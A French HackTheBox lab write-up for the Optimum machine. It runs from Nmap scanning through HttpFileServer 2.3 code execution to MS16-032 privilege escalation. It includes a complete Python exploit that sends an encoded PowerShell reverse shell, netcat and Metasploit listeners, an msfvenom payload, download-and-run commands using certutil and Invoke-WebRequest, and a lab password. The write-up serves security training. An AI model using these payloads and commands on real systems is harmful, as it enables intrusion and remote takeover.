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# Compte rendu HackTheBox d'Optium

{% embed url="<https://app.hackthebox.com/machines/6>" %}

{% hint style="warning" %}
**Compétences :**

* Exploitation de HttpFileServer 2.3 (RCE)
* Énumération du système - Windows Exploit Suggester
* Windows Server 12 (MS16-032) (Élévation de privilèges)
  {% endhint %}

## Reconnaissance

**Configuration de l'espace de travail :**

Configurez l'espace de travail en créant trois dossiers pour stocker le contenu important, les exploits et les résultats de reconnaissance Nmap.

<figure><img src="/files/233f9d8a072381e4899b0ff571a7da0eb24a883c" alt="" width="563"><figcaption></figcaption></figure>

**Vérification de la connectivité VPN**

Vérifiez la connectivité VPN pour assurer une communication stable avec la machine cible.

<figure><img src="/files/4b91ffa7688918b15f2fdda555977c1b3a833e0d" alt="" width="563"><figcaption></figcaption></figure>

**Découverte des ports ouverts avec Nmap :**

Énumérez les ports ouverts et exportez les résultats dans le fichier "allPorts" du répertoire Nmap :

```bash
nmap --open -p- -sS --min-rate 5000 -vvv -n -Pn 10.10.10.8 -oG allPorts
```

<figure><img src="/files/5fba8e58ab1bb793bf4b097a972b412be3bb2e37" alt=""><figcaption></figcaption></figure>

**Analyse des ports ouverts avec extractPorts :**

En utilisant la fonction extractPorts pour afficher de manière concise les ports ouverts et les copier dans le presse-papiers (80)

<figure><img src="/files/9012bce92c9061afb4689b0167111214033037e8" alt="" width="563"><figcaption></figcaption></figure>

Scan de version des ports avec Nmap :

Utilisez Nmap pour analyser les versions des services et enregistrer la sortie dans le fichier "targeted" :

```bash
nmap -sCV -p80 10.10.10.8 -oN targeted
```

<figure><img src="/files/3cdc1489b4a98903e547da985c929fedd92bcce4" alt=""><figcaption></figcaption></figure>

Pour résoudre les noms de domaine en adresses IP via DNS, le nom de domaine associé à son adresse IP est inséré dans le `/etc/hosts` fichier :

<figure><img src="/files/7c273fc58e8033ec4584af7bb79e8ac49037edfd" alt="" width="563"><figcaption></figcaption></figure>

## **Exploitation**

### **Port 80 : HttpFileServer 2.3**

Un serveur web HttpFileServer 2.3 a été découvert. Après recherche, cette version est vulnérable à l’exécution de code à distance (NCE).

<figure><img src="/files/769e40bd10f71cbd8a53d9711849edaa311cbc12" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/3f05d6450dbf12a3c4c7d04c9c3e953420dc8f20" alt="" width="503"><figcaption></figcaption></figure>

### **Recherche d’exploit**

Commande :

```bash
searchsploit -m windows/remote/49584.py
```

{% embed url="<https://www.exploit-db.com/exploits/39161>" %}

**Script Python personnalisé**

<figure><img src="/files/a6438e7f2ed60c032f86ed794a78f2c07fd16b8e" alt=""><figcaption></figcaption></figure>

**Script Python personnalisé**

Le script doit être modifié pour inclure les paramètres suivants :

* `LHOST`  : votre IP locale (VPN).
* `LPORT`: port d’écoute local (par ex. 4444).
* `RHOST` : IP cible.
* `RPORT`: port du service vulnérable (par ex. 80).

```python
import base64
import os
import urllib.request
import urllib.parse

lhost = "10.10.14.12"
lport = 4444
rhost = "10.10.10.8"
rport = 80

# Définir la commande à écrire dans un fichier
command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (Invoke-Expression $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (Get-Location).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()'

# Encoder la commande au format base64
encoded_command = base64.b64encode(command.encode("utf-16le")).decode()
print("/nCommande encodée au format base64...")

# Définir la charge utile à inclure dans l’URL
payload = f'exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}'

# Encoder la charge utile et envoyer une requête HTTP GET
encoded_payload = urllib.parse.quote_plus(payload)
url = f'http://{rhost}:{rport}/?search=%00{{.{encoded_payload}.}}'
urllib.request.urlopen(url)
print("/nCharge utile encodée et requête HTTP GET envoyée à la cible...")

# Afficher quelques informations
print("/nAffichage de quelques informations pour le débogage...")
print("lhost: ", lhost)
print("lport: ", lport)
print("rhost: ", rhost)
print("rport: ", rport)
print("payload: ", payload)

# Écouter les connexions
print("/nEn attente de connexion...")
os.system(f'nc -nlvp {lport}')
```

Écoute sur votre machine :

```bash
rlwrap nc -nlvp 4444
```

<figure><img src="/files/61ee6ce38a0b3c799cce976fa72f528119afb5ac" alt=""><figcaption></figcaption></figure>

### Drapeau user.txt :)

<figure><img src="/files/1ae3e26dafeb87f00d0139c37b684bcf05f4dd4c" alt="" width="563"><figcaption></figcaption></figure>

## **Élévation de privilèges**

### **Énumération winPEAS** <a href="#winpeas-enumeration" id="winpeas-enumeration"></a>

Nous avons lancé l’outil winPEAS pour effectuer une reconnaissance sur la machine cible via winrm. L’objectif est de découvrir des informations sensibles et d’identifier des vulnérabilités potentielles.

{% embed url="<https://github.com/carlospolop/PEASS-ng/releases/tag/20220717>" %}

**Télécharger et exécuter winPEAS**

```
Invoke-WebRequest -Uri "http://10.10.14.12/winPEASx64.exe" -OutFile "winPEAS.exe"
./winPEAS.exe
```

<figure><img src="/files/5c462696f535f24ea60e1a275a620a80d308dc5d" alt=""><figcaption></figcaption></figure>

Cela nous a permis de découvrir des informations critiques, telles que des mots de passe et des détails sur la version du système d’exploitation.

<figure><img src="/files/edfd36f68b8c65c1f3b1e213d665136b0627b8e4" alt=""><figcaption></figcaption></figure>

**Mots de passe découverts**

`kostas:kdeEjDowkS*`

De plus, l’outil a révélé que la machine exécutait Windows Server 2012 R2 Standard, une version vulnérable avec un exploit associé pour l’élévation de privilèges via le noyau.

<figure><img src="/files/25bd4a09b0d214604a9abb07fe5883216bb80202" alt=""><figcaption></figcaption></figure>

### Exploitation du noyau :

Nous avons recherché des exploits spécifiques pour Windows Server 2012 R2 afin d’effectuer une élévation locale des privilèges. Le **MS16-032** exploit s’est révélé pertinent pour cette version de Windows.

{% embed url="<https://github.com/SecWiki/windows-kernel-exploits>" %}

* **MS16-032** pour Windows 2012 R2 (élévation locale de privilèges).

{% embed url="<https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032>" %}

### **Reverse shell via Metasploit**

Nous avons ensuite créé un fichier a.exe pour établir un shell inversé depuis Metasploit. Les étapes suivantes ont été suivies :

Écoute de Metasploit :

```bash
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.12
set LPORT 4444
exploit -j
```

Créer le payload `shell.exe` avec la commande suivante :

<pre class="language-bash"><code class="lang-bash"><strong>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=4444 -f exe -o shell.exe
</strong></code></pre>

Transférer le payload à l’aide d’un serveur HTTP Python et `certutil`:

```bash
python3 -m http.server
```

```powershell
certutil.exe -f -urlcache -split http://10.10.14.12:8000/shell.exe
```

Une fois le fichier transféré, nous avons réussi à établir une session Meterpreter (session 1).

<figure><img src="/files/3e62b08f642e4cd64ddc6f74f39e027c28ba8421" alt=""><figcaption></figcaption></figure>

### **Exploitation de la vulnérabilité MS16-032**

Après avoir obtenu l’accès à la machine, nous avons recherché l’exploit vulnérable dans Metasploit :

`exploit/windows/local/ms16_032_secondary_logon_handle_privesc`

<figure><img src="/files/133f15e303f38755a5f81f884835a281e319c625" alt="" width="563"><figcaption></figcaption></figure>

Nous avons défini les sessions, défini `LHOST` et `LPORT`, et sélectionné la cible Windows x64 pour éviter les conflits. Une fois l’exploit terminé, nous avons obtenu un accès complet au système cible.

<figure><img src="/files/d7f7b11b540951f81884a61078c853be41d0d5c0" alt=""><figcaption></figcaption></figure>

### Flag root :)

<figure><img src="/files/a53555f2a019b849ddd789a6bcf9a84fafd1f2b4" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/7a2b358076a0f023b74350f51e894540c94f396f" alt="" width="523"><figcaption></figcaption></figure>


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```

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